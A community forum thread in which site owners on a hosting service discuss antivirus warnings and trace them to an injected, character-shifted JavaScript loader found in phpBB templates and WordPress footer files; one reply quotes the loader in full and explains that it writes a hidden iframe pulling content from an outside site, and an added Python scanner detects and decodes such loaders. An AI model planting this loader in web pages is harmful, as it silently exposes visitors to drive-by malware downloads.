xisto Community
Moody

Scanning My Site on viruses


When I go to your site, all I can see is the Index Directory page, and nothing else, NO virus warnings or anything like that. Perhaps your Norton doesn't like Xisto. :mellow: GreetingZ


Now I hate to admit it, but a friend when visiting my blog (hosted here) had the same issue. But then with trojans....

She also uses Norton...

My blog http://forums.xisto.com/no_longer_exists/

Some more - Klass went to my site, which gives him an ActiveX error (though I at NO point used ActiveX in my site - only HTML, JavaScript and PHP) and that originated from an IP address other than my own site's IP (here's the WHOIS on the IP). What also worries me is - the 69.50.177.102/x379 seems to be a redirect to xawm.biz :cry:

The issue in my case seems to be a theme I updated last night, it held a small section of JavaScript code that forced my visitors in IE to download a trojan from a Russian site. So I urge you to manually check code - in WordPress also the Themes for JavaScript code.


Guys (moody, moonwitch), you both seem to share the same problem.

Moody is using a phpBB forum, and moon has problems with her blog, which runs on WordPress.

However, you both (well.. only moody now, moon deleted her problem a while ago) have a piece of JavaScript at the bottom of your site.

<script language="javascript" type="text/javascript">var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@%kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}document.write(h);</script></body>

When you decode it, you can see that it's actually a hidden frame which attempts to open a site http://forums.xisto.com/no_longer_exists/

Which, in return, attempts to open these sites:

http://forums.xisto.com/no_longer_exists/

http://forums.xisto.com/no_longer_exists/

The first one is some kind of counter, which can be ignored.

The second one attempts to load a certain applet, which I can't be bothered to check out what it exactly does, probably something malicious :S

To make a long story short. This is what could've happened.

1. Both of you suffered from an automated exploit batch which put the code there.
2. You guys got your site hacked, because someone was bored
3. I think this is it, Xisto has gotten hacked :|.

I come to this conclusion because both Moody and Moonwitch use a quite common piece of software (phpbb, wordpress), and they have the same problem at around the same time. And that there is some kind of script around here somewhere that changes stuff (cronjob maybe?).

Anyway, everyone, if you use any kind of common software, forums/message boards/blogs etc. etc..

Please check your site for the above code and remove it. And report it of course.

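A static check for the loader quoted above, as an added example that is not part of the original thread: it undoes the character shift without executing the script and lists the files under a web root that carry it, generalised to any shift amount rather than only 3. The function names, the extension list and the sample input are assumptions made for illustration, and the sample uses a placeholder host.

```python
import os
import re

# Loader shape quoted in the thread: a quoted string assigned to a variable,
# then decoded with String.fromCharCode(<var>.charCodeAt(...)-N).
LOADER = re.compile(
    r"var\s+(\w+)\s*=\s*'([^']*)'.{0,300}?"
    r"String\.fromCharCode\(\s*\1\.charCodeAt\([^)]*\)\s*-\s*(\d+)\s*\)",
    re.S,
)
IFRAME_SRC = re.compile(r"<iframe[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
EXTENSIONS = (".php", ".html", ".htm", ".tpl", ".js")

def shift(text, n):
    """Shift each character code by n, wrapping like String.fromCharCode."""
    return "".join(chr((ord(c) + n) % 65536) for c in text)

def inspect(source):
    """Return (decoded_markup, iframe_srcs) for each shifted loader found."""
    findings = []
    for m in LOADER.finditer(source):
        decoded = shift(m.group(2), -int(m.group(3)))
        findings.append((decoded, IFRAME_SRC.findall(decoded)))
    return findings

def scan_tree(root):
    """Walk a web root and map each affected file path to its findings."""
    hits = {}
    for folder, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXTENSIONS):
                path = os.path.join(folder, name)
                with open(path, encoding="latin-1") as fh:
                    found = inspect(fh.read())
                if found:
                    hits[path] = found
    return hits

# Constructed sample: a harmless placeholder iframe, shifted by +3 and wrapped
# in the same loader shape. example.invalid is not a real host.
PLAIN = '<iframe src="http://example.invalid/x" width=1 height=1></iframe>'
SAMPLE = ("<p>footer</p><script>var k='" + shift(PLAIN, 3) + "',t=0,h='';"
          "while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}"
          "document.write(h);</script></body>")

if __name__ == "__main__":
    print(inspect(SAMPLE))
```

Running `scan_tree` over every theme and template directory, not only the active one, matters here because the thread reports the code being added to every `footer.php` and coming back after deletion.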

I once installed a test forum here on Xisto, but FORTUNATELY I can't find any of the malicious source code in my pages. I hope that nobody here on Xisto is being hacked. :mellow:


OK guys, I can say my problem is also a trojan. Norton says that, but where is that code, I mean in which file, or do I have to check all my files? Please help, because I think my visitors don't like this.


OK guys, good news, I overwrote the templates subsilver folder and I don't get the error from Norton anymore, so I guess the trojan is away, but of course I want to change my password now and it won't work. I get this: "There was an error manipulating the password file." Can you help me?


In my case - I had to check the source code of my blog. Apparently the code got added to every footer.php file in all my skins for WordPress. And I deleted the code last night - to return and find the code came back :mellow:

Password changes, moody, are per request.
http://forums.xisto.com/topic/101-forum/


I think cPanel comes with an antivirus! You can scan your system with that. I haven't been hosted yet but my earlier host had an antivirus after a virus outbreak affecting all my PHP files! Some 'iframe' problem stuff!
